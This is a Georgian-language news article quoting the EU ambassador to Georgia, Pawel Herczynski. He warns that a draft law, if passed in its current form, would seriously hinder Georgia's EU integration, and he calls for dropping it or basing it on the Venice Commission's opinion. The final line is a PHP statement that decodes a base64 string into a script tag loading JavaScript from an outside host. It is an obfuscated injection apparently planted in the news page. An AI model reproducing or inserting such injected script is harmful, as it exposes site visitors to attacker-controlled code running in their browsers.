celsiusi
ავერსი საქკაბელი

 რა თქმა უნდა, ყველაზე მარტივი და საუკეთესო გამოსავალი იქნება ამ კანონპროექტის ჩაგდება და არ მიღება - იმ შემთხვევაში თუ აღნიშნული კანონპროექტი მიიღება ამჟამად არსებული სახით, ეს იქნება სერიოზული წინაღობა საქართველოს ევროკავშირში ინტეგრაციისთვის, - ამის შესახებ საქართველოში ევროკავშირის ელჩმა პაველ ჰერჩინსკიმ განაცხადა.

ამასთან, როგორც ელჩმა აღნიშნა, თუ ამ კანონის მიღება მაინც აუცილებელია, ეს უნდა იყოს აბსოლუტურად განსხვავებული კანონი, რომელიც დაეფუძნება ვენეციის კომისიის სამართლებრივ მოსაზრებას.

„რა თქმა უნდა, ყველაზე მარტივი და საუკეთესო გამოსავალი იქნება ამ კანონპროექტის ჩაგდება და არ მიღება. მე მესმის, რომ ჯერ კიდევ არსებობს მსგავსი შესაძლებლობა. სხვა შემთხვევაში, არსებობს საპარლამენტო პროცედურები და დარწმუნებული ვარ, რომ ეს საპარლამენტო პროცედურები შესრულდება. ჩვენ ყველა ველოდებით ვენეციის კომისიის მოსაზრებას.როგორც აქამდეც არაერთხელ განვაცხადეთ, ვენეციის კომისია არის საერთაშორისო სტანდარტის დამწესებელი, როდესაც საქმე ეხება სამართლებრივ საკითხებს. აქედან გამომდინარე, გულწრფელად ვიმედოვნებ, რომ ან ეს კანონი საერთოდ არ მიიღება, ან იმ შემთხვევაში თუ ამ კანონის მიღება აუცილებელია, ეს იქნება აბსოლუტურად განსხვავებული კანონი, დაფუძნებული ვენეციის კომისიის სამართლებრივ მოსაზრებაზე. მაგრამ ამისთვის ჩვენ ჯერ კიდევ გვაქვს დრო და მზად ვართ, ვიმუშაოთ ყველასთან, იმისთვის, რათა თავიდან ავიცილოთ არსებული სახით კანონპროექტის მიღება, რადგან კანონი არსებული სახით არ არის შესაბამისობაში ევროკავშირის ნორმებთან და ღირებულებებთან.

კანონები მიიღება საქართველოს პარლამენტის მიერ, ქართველი ხალხის გადასაწყვეტია, რა კანონები სურთ თავის ქვეყანაში. მაგრამ ჩემი როლი, როგორც ევროკავშირის ელჩის, არის შედეგებზე საუბარი - იმ შემთხვევაში თუ აღნიშნული კანონპროექტი მიიღება ამჟამად არსებული სახით, ეს იქნება სერიოზული წინაღობა საქართველოს ევროკავშირში ინტეგრაციისთვის, ამიტომ ვიმედოვნებთ, რომ ამ კანონის მიღება არ მოხდეს არსებული ფორმით და ევროკავშირი მზად არის დახმარებისთვის, იმდენად რამდენადაც შეგვიძლია, მაგრამ კვლავ, საქართველოს კანონების მიღება წყდება საქართველოს პარლამენტში, ქართველი პოლიტიკური პარტიების მიერ და სხვა არავის მიერ. გადაწყვეტილებად სრულად არის ქართველი პოლიტიკოსების ხელში“, - განაცხადა პაველ ჰერჩინსკიმ.

164
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");